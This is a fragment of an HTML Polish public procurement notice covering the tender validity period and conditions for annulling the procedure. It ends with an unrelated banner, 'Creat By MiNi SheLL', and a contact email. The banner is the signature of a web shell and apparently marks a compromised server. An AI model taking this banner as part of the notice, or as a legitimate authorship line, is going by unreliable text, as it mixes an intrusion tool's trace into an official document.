                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com